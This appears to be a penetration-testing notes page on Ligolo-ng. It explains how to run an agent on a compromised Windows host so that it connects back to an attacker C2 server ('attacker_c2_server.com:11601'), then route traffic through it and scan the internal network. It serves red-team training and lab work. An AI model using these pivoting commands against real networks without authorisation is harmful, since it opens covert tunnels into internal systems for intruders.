Ligolo-ng

An advanced, yet simple, tunneling tool that uses TUN interfaces.

https://github.com/nicocha30/ligolo-ng

Starting Ligolo

You should transfer an agent client to your target machine.

Setting up a NIC

When using Linux, you need to create a tun interface on the Proxy Server (C2):

#sudo ip tuntap add user [your_username] mode tun ligolo
#sudo ip link set ligolo up

Kali> sudo ip tuntap add user iptracej mode tun ligolo
Kali> sudo ip link set ligolo up
Kali> ifconfig

Starting a Proxy

# ./proxy -h # Help options 
Kali> proxy -selfcert

Staring an Agent

# $ ./agent -connect attacker_c2_server.com:11601 
CMD> .\agent.exe -connect 172.16.11.11:11601 -retry -ignore-cert

Proxy Operation

# INFO[0102] Agent joined.  name="NT AUTHORITY\\SYSTEM@MS01" remote="192.168.100.2:49719"

Use 'session' command to select the agent. You can select a sessin number here. 

#ligolo-ng »  
#? Specify a session : 1 - NT AUTHORITY\SYSTEM@MS01 - 192.168.100.2:49719

Use 'ipconfig' command to select the agent. 

#[Agent : NT AUTHORITY\SYSTEM@MS01] » 
┌───────────────────────────────────────────────┐
 Interface 0                                   
├──────────────┬────────────────────────────────┤
 Name          Ethernet0                      
 Hardware MAC  00:0c:29:3c:a0:bb              
 MTU           1500                           
 Flags         up|broadcast|multicast|running 
 IPv4 Address  192.168.100.2/24               
└──────────────┴────────────────────────────────┘
┌───────────────────────────────────────────────┐
 Interface 1                                   
├──────────────┬────────────────────────────────┤
 Name          Ethernet1                      
 Hardware MAC  00:0c:29:3c:a0:c5              
 MTU           1500                           
 Flags         up|broadcast|multicast|running 
 IPv4 Address  10.10.1.2/24                   
└──────────────┴────────────────────────────────┘
┌──────────────────────────────────────────────┐
 Interface 2                                  
├──────────────┬───────────────────────────────┤
 Name          Loopback Pseudo-Interface 1   
 Hardware MAC                                
 MTU           -1                            
 Flags         up|loopback|multicast|running 
 IPv6 Address  ::1/128                       
 IPv4 Address  127.0.0.1/8                   
└──────────────┴───────────────────────────────┘

Add an route to your target network

Kali> sudo ip route add 10.10.1.0/24 dev ligolo
Kali> ip route

# Remove the route
# Kali> sudo ip route del 10.10.1.0/24 dev ligolo

Start tunnel 

#[Agent : NT AUTHORITY\SYSTEM@MS01] » 
#[Agent : NT AUTHORITY\SYSTEM@MS01] » INFO[1113] Starting tunnel to NT AUTHORITY\SYSTEM@MS01

Kali Commands

ping -c 2 <internal machine>
nmap -sC -sv <internal machine> 
...
PreviousPivoting / NetworkNextLocal ports(127.0.0.1)

Last updated